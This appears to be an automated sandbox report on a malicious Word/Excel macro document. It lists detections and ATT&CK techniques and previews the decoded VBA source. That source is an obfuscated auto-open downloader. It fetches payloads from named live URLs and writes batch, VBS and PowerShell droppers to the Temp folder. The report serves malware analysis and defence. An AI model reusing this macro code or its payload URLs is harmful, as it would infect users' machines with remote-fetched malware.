MALICIOUS
370
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample contains multiple VBA auto-execution macros (AutoOpen, Workbook_Open) that are designed to run automatically when the document is opened. These macros utilize the Shell() function and CreateObject() to download a payload from one of the provided URLs, specifically 'http://peakperformancelifestyle.com/wp-content/plugins/6612536153.txt' or 'http://penis-enhancement-secrets.com/wp-content/plugins/6612536153.txt', and execute it. The presence of these elements strongly indicates a downloader functionality.
Heuristics 11
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://peakperformancelifestyle.com/wp-content/plugins/lns.txt In document text (OLE body)
- http://penis-enhancement-secrets.com/wp-content/plugins/lns.txtIn document text (OLE body)
- http://peakperformancelifestyle.com/wp-content/plugins/6612536153.txtIn document text (OLE body)
- http://penis-enhancement-secrets.com/wp-content/plugins/6612536153.txtIn document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8055 bytes |
SHA-256: d9a0e2f88c3f0f4c9e017e7db13fd78d080564177efad7356a7738ef17b4d45d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Workbook_Open()
Auto_Open
End Sub
Sub HUhdkqwudhqwkhqwjd()
ahsduiwhdqiu
End Sub
Sub Auto_Open()
ahsduiwhdqiu
End Sub
Sub ahsduiwhdqiu()
Dim huwe, auwd As Integer
Dim fileNumber As Integer
Dim retVal As Variant
HUWQD = Module1.Whqwhdbgh(30000)
FL2 = HUWQD
HPPSDJ = "Temp"
PH2 = Module1.Bad("" & HPPSDJ) + "\"
NDUWGD = "78192737129361298"
HYWDAX = "baklajskdlajsdjaiwhdkt"
JWIDJIAAA = "" + Chr(97 + Sgn(5)) + "a"
HUYFEA = JWIDJIAAA + Right(HYWDAX, 1)
WKDOQ = NDUWGD
PSFL = FL2 + "" & "." + "p" + "" + Chr(Asc("s")) _
+ _
"1"
VBFL = FL2 + Chr(50 - 4) + "v" + "b" & "s"
huwe = 1
BAFL = FL2 + Chr(Sgn(Fix(-22.043)) + 11 + 10 + 25 + huwe + 0) + HUYFEA
INTG = "" & "o" & "bject"
AFTG = "m" & "odule"
SXE = "" & Chr(Asc(".")) & Chr(101) & "xe" & ""
GNG = ".png"
PHT = "" & "htt" & "p://" & ""
SPIC = PHT + "sav" & "epic.su/"
QIWJD = PSFL
PSPTH = PH2 + QIWJD
VBPTH = PH2 + VBFL
BAPTH = PH2 + BAFL
DRT = 230
BFT = 231
CFT = 232
DFT = 233
EFT = 234
Dim PBIn As String, asdwq As String, MIWDWQ As String
PBIn = "http://peakperformancelifestyle.com/wp-content/plugins/6612536153.txt"
CONT = Module1.Spice(PBIn)
asdwq = CONT
HQUWDAAA = "0"
If (asdwq = "") Then
PBIn = "http://penis-enhancement-secrets.com/wp-content/plugins/6612536153.txt"
CONT = Module1.Spice(PBIn)
asdwq = CONT
HQUWDAAA = "1"
End If
CONT = Module1.Puqwndkqwb(asdwq)
TVT10 = Module1.Tort(CONT, "text10")
TVT20 = Module1.Tort(CONT, "text20")
TVT21 = Module1.Tort(CONT, "text21")
TVT30 = Module1.Tort(CONT, "text30")
TVT31 = Module1.Tort(CONT, "text31")
XPT1 = Module1.Tort(CONT, "stext1")
XPT2 = Module1.Tort(CONT, "stext2")
XPT3 = Module1.Tort(CONT, "stext3")
WVR = Module1.Bad("US" & "ERP" & "ROFILE")
UQHWDUQHWIUHDUIWQ = "qklwjeklqwje kqwlej 2j1ikej 21lkej 1j2lke"
IHQHWDUIQWHDUI = "kj2h jk2h1j 3k12h "
hufehu1 = ""
hufehu1 = 0 + InStr(WVR, "sers\")
Dim hudhw As Integer
Dim ghdAdd(1 To 3)
ghdAdd(1) = "1"
ghdAdd(2) = "0"
ghdAdd(3) = "0"
If (hufehu1 <> 0) Then
ghdAdd(1) = "2"
Else
ghdAdd(2) = "3"
End If
JHWQUD = Join(ghdAdd)
hudhw = Val(JHWQUD)
Module1.WaitFor (1)
MIWDWQ = "http://peakperformancelifestyle.com/wp-content/plugins/lns.txt"
If (HQUWDAAA = "1") Then
MIWDWQ = "http://penis-enhancement-secrets.com/wp-content/plugins/lns.txt"
End If
SEXX = Module1.Spice(MIWDWQ)
PSTB = PBIn + "123123123"
STAR1 = SPIC + "5603061" + GNG
STAR2 = SPIC + "5599989" + GNG
FFQ = "8"
FF = FFQ + SXE
Dim ashduqwihdq As Integer
ashduqwihdq = Val(129 + 60.123 \ Int("2") - 29 - hudhw)
If (ashduqwihdq = 0) Then
Open BAPTH For Output As #DRT
Print #DRT, XPT1
Print #DRT, ":lqwjdjqiw"
Print #DRT, ":lwijdsji"
Print #DRT, "set trfd=" + Chr(34) + PH2 + Chr(34)
Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
Print #DRT, XPT2
Close #DRT
Module1.WaitFor (1)
Open VBPTH For Output As #BFT
Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
Print #BFT, XPT3
Close #BFT
Modul
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.